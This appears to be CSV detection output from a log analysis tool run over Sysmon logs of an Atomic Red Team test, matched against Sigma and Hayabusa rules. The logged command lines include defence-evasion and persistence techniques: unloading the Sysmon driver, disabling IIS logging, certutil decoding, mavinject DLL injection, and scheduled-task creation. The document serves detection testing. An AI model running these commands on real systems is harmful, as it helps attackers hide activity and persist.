+2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
